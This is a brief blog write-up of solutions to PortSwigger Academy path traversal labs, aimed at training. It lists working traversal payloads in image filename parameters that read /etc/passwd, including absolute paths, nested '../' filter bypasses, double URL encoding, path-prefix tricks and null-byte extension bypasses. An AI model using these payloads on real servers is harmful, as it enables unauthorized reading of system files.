Posts Portswigger Academy Notes: Path Traversal
Post
Cancel

Portswigger Academy Notes: Path Traversal

Apr 15, 2021 2021-04-15T16:00:00-07:00 on CTF, writeup

Goal: Read /etc/passwd

Lab Solutions

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

Lab1 - Basic:
/image?filename=../../../../../../../etc/passwd

Lab2 - Absolute Path:
/image?filename=/etc/passwd

Lab3 - Recursively removing ../:
/image?filename=....//....//....//etc/passwd

Lab4 - Wack URL Encoding:
..%252f..%252f..%252fetc%252fpasswd
[Resource for this one](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work).

Lab4 - Path Verification:
/image?filename=/var/www/images/../../../etc/passwd

Lab5 - Null Byte:
/image?filename=/../../../etc/passwd%00.png
writeup
This post is licensed under CC BY 4.0

Union CTF Writeup

TryHackMe: Vulnnet Node